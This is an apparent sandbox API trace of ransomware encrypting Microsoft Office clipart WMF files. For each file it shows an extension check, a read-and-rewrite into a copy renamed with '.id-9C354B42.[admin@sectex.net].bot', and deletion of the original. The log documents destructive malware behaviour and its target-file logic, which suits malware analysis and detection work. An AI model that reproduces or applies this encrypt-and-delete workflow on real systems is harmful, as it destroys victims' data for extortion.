	[0149.252] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x738, lpOverlapped=0x0) returned 1
	[0149.454] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x740, lpOverlapped=0x0) returned 1
	[0149.454] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.454] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.455] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.455] CloseHandle (hObject=0x3f0) returned 1
	[0149.455] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.455] SetEndOfFile (hFile=0x384) returned 1
	[0149.457] CloseHandle (hObject=0x384) returned 1
	[0149.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.467] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf")) returned 1
	[0149.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.539] lstrlenW (lpString=".doc") returned 4
	[0149.539] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.539] lstrlenW (lpString=".docx") returned 5
	[0149.539] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.539] lstrlenW (lpString=".pdf") returned 4
	[0149.539] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.539] lstrlenW (lpString=".xls") returned 4
	[0149.539] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.539] lstrlenW (lpString=".xlsx") returned 5
	[0149.539] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.539] lstrlenW (lpString=".ppt") returned 4
	[0149.539] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString=".zip") returned 4
	[0149.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.540] lstrlenW (lpString=".rar") returned 4
	[0149.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString=".bz2") returned 4
	[0149.540] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString=".7z") returned 3
	[0149.540] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString=".dbf") returned 4
	[0149.540] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString=".1cd") returned 4
	[0149.540] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString=".jpg") returned 4
	[0149.540] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.540] lstrlenW (lpString=".doc") returned 4
	[0149.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString=".docx") returned 5
	[0149.540] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.540] lstrlenW (lpString=".pdf") returned 4
	[0149.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.540] lstrlenW (lpString=".xls") returned 4
	[0149.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.540] lstrlenW (lpString=".xlsx") returned 5
	[0149.540] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.540] lstrlenW (lpString=".ppt") returned 4
	[0149.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.541] lstrlenW (lpString=".zip") returned 4
	[0149.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.541] lstrlenW (lpString=".rar") returned 4
	[0149.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.541] lstrlenW (lpString=".bz2") returned 4
	[0149.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.541] lstrlenW (lpString=".7z") returned 3
	[0149.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.541] lstrlenW (lpString=".dbf") returned 4
	[0149.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.541] lstrlenW (lpString=".1cd") returned 4
	[0149.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63
	[0149.541] lstrlenW (lpString=".jpg") returned 4
	[0149.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.541] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.541] lstrlenW (lpString="IN00915_.WMF") returned 12
	[0149.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.621] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=12748) returned 1
	[0149.621] CloseHandle (hObject=0x3f8) returned 1
	[0149.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf")) returned 0x20
	[0149.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.820] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.820] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.821] GetLastError () returned 0x0
	[0149.821] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x31cc, lpOverlapped=0x0) returned 1
	[0149.830] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x31d0, lpOverlapped=0x0) returned 1
	[0149.831] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.831] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.831] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.831] CloseHandle (hObject=0x3ec) returned 1
	[0149.831] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.831] SetEndOfFile (hFile=0x384) returned 1
	[0149.833] CloseHandle (hObject=0x384) returned 1
	[0149.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.835] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf")) returned 1
	[0149.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.836] lstrlenW (lpString=".doc") returned 4
	[0149.836] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.836] lstrlenW (lpString=".docx") returned 5
	[0149.836] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.836] lstrlenW (lpString=".pdf") returned 4
	[0149.836] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.836] lstrlenW (lpString=".xls") returned 4
	[0149.836] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.836] lstrlenW (lpString=".xlsx") returned 5
	[0149.836] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.836] lstrlenW (lpString=".ppt") returned 4
	[0149.836] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.836] lstrlenW (lpString=".zip") returned 4
	[0149.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.836] lstrlenW (lpString=".rar") returned 4
	[0149.836] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.836] lstrlenW (lpString=".bz2") returned 4
	[0149.836] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.836] lstrlenW (lpString=".7z") returned 3
	[0149.837] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString=".dbf") returned 4
	[0149.837] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString=".1cd") returned 4
	[0149.837] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString=".jpg") returned 4
	[0149.837] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString=".doc") returned 4
	[0149.837] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString=".docx") returned 5
	[0149.837] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.837] lstrlenW (lpString=".pdf") returned 4
	[0149.837] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString=".xls") returned 4
	[0149.837] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.837] lstrlenW (lpString=".xlsx") returned 5
	[0149.837] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.837] lstrlenW (lpString=".ppt") returned 4
	[0149.837] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.837] lstrlenW (lpString=".zip") returned 4
	[0149.837] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.837] lstrlenW (lpString=".rar") returned 4
	[0149.837] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.837] lstrlenW (lpString=".bz2") returned 4
	[0149.837] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.838] lstrlenW (lpString=".7z") returned 3
	[0149.838] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.838] lstrlenW (lpString=".dbf") returned 4
	[0149.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.838] lstrlenW (lpString=".1cd") returned 4
	[0149.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63
	[0149.838] lstrlenW (lpString=".jpg") returned 4
	[0149.838] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.838] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.838] lstrlenW (lpString="J0086420.WMF") returned 12
	[0149.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.897] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=9596) returned 1
	[0149.897] CloseHandle (hObject=0x3d0) returned 1
	[0149.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf")) returned 0x20
	[0149.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.939] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.939] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0149.943] GetLastError () returned 0x0
	[0149.943] ReadFile (in: hFile=0x3ec, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x257c, lpOverlapped=0x0) returned 1
	[0149.949] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2580, lpOverlapped=0x0) returned 1
	[0149.950] ReadFile (in: hFile=0x3ec, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.950] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.950] SetEndOfFile (hFile=0x3b4) returned 1
	[0149.951] CloseHandle (hObject=0x3b4) returned 1
	[0149.951] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.951] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.116] CloseHandle (hObject=0x3ec) returned 1
	[0150.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.137] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf")) returned 1
	[0150.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.140] lstrlenW (lpString=".doc") returned 4
	[0150.140] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.140] lstrlenW (lpString=".docx") returned 5
	[0150.140] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0150.140] lstrlenW (lpString=".pdf") returned 4
	[0150.140] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.140] lstrlenW (lpString=".xls") returned 4
	[0150.140] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.140] lstrlenW (lpString=".xlsx") returned 5
	[0150.140] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0150.140] lstrlenW (lpString=".ppt") returned 4
	[0150.140] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.140] lstrlenW (lpString=".zip") returned 4
	[0150.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.140] lstrlenW (lpString=".rar") returned 4
	[0150.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.140] lstrlenW (lpString=".bz2") returned 4
	[0150.140] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.140] lstrlenW (lpString=".7z") returned 3
	[0150.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.141] lstrlenW (lpString=".dbf") returned 4
	[0150.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.141] lstrlenW (lpString=".1cd") returned 4
	[0150.141] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.141] lstrlenW (lpString=".jpg") returned 4
	[0150.141] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.141] lstrlenW (lpString=".doc") returned 4
	[0150.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.141] lstrlenW (lpString=".docx") returned 5
	[0150.141] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0150.141] lstrlenW (lpString=".pdf") returned 4
	[0150.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.141] lstrlenW (lpString=".xls") returned 4
	[0150.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.141] lstrlenW (lpString=".xlsx") returned 5
	[0150.141] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0150.141] lstrlenW (lpString=".ppt") returned 4
	[0150.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.142] lstrlenW (lpString=".zip") returned 4
	[0150.142] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.142] lstrlenW (lpString=".rar") returned 4
	[0150.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.142] lstrlenW (lpString=".bz2") returned 4
	[0150.142] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.142] lstrlenW (lpString=".7z") returned 3
	[0150.142] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.142] lstrlenW (lpString=".dbf") returned 4
	[0150.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.142] lstrlenW (lpString=".1cd") returned 4
	[0150.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63
	[0150.142] lstrlenW (lpString=".jpg") returned 4
	[0150.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.142] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.142] lstrlenW (lpString="J0086478.WMF") returned 12
	[0150.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.143] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14174) returned 1
	[0150.143] CloseHandle (hObject=0x3f0) returned 1
	[0150.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf")) returned 0x20
	[0150.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.143] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.143] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.144] GetLastError () returned 0x0
	[0150.144] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x375e, lpOverlapped=0x0) returned 1
